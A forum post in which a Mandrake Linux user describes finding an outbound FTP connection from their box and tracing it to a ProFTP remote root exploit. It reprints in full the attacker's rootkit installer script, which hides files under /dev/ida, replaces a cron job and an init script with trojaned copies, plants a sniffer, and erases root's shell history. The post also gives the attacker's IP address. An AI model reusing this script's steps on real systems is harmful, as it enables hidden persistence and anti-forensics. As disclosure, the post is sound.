I was examining my own Mandrake 9.2 system this evening watching the incoming and outgoing logs on my Linksys router. I've been suspicious for a few weeks now that perhaps there is some illicit outgoing connections from this box. Snort is installed along with ACID and I've been trying to set up Tripwire... Suddenly, the router picks up an OUTBOUND ftp connection from my box. Very damn odd. I yanked the ethernet plug from the box and wrote down the IP address of the outbound connection. I jumped over to another computer and ftp'd to that server logging in anonymously.
There was a rootkit script sitting there. I downloaded it and opened it with a text editor. Here are the contents:
Code:
clear
echo
echo "--------------profesional rootkit for redhat linux-------------"
echo -n " -o-o-o-o-o-o-o-o-o-o-o-"
if [ -x /dev/ida ]
then echo "/dev/ida/ exists...no need to create it"
else mkdir /dev/ida/
fi
if [ -x /dev/ida/inet/ ]
then echo "/dev/ida/inet/ exists...no need to create it"
else mkdir /dev/ida/inet/
fi
mv pizda.tar.gz /dev/ida/inet/
cd /dev/ida/inet/
tar -xzvf pizda.tar.gz -C /dev/ida/inet/
rm -rf /etc/rc.d/init.d/linuxconf
if [ -f /usr/lib/httpd ]
then echo "/usr/lib/httpd exists...in pizda masii de treaba !!!"
else mv /dev/ida/inet/pizda/sniff/httpd /usr/lib/httpd
fi
if [ -f /usr/lib/sense ]
then echo "/usr/lib/sense exists... deci prin urmare il las acolo ca nu strica !!!"
else mv /dev/ida/inet/pizda/sniff/sense /usr/lib/sense
fi
rm -rf /etc/cron.daily/dnsquery
rm -rf /etc/rc.d/init.d/linuxconf
mv /dev/ida/inet/pizda/sniff/dnsquery /etc/cron.daily/dnsquery
mv /dev/ida/inet/pizda/redhat/linuxconf /etc/rc.d/init.d/linuxconf
rm -rf /root/.bash_history
ln -s /dev/null /root/.bash_history
echo "+++ [ OK ] with the /root/.bash_history file..."
There were also some files in a directory called 'lib' that had names like libc-2.2.2.so and ld-linux.so.2 I downloaded those as well.
So I go back to check my router's incoming log and the attacker is repeatedly hitting ports 21 and 113. If the linksys is doing its job right, 113 (identd) isn't forwarded to my Mandrake box (still unplugged from the network anyway), but 21 is the ftp port and was being forwarded to the Mandrake box. I checked the Mandrake Security bulletins and sure enough, there is a
remote root shell exploit out on ProFTP. Here is the advisory.
http://www.mandrakesecure.net/en/adv...KSA-2003:095-1
Looks like another re-install for me in under a month.
di11rod
Oh yeah, here's the attacker's IP address:
211.21.91.18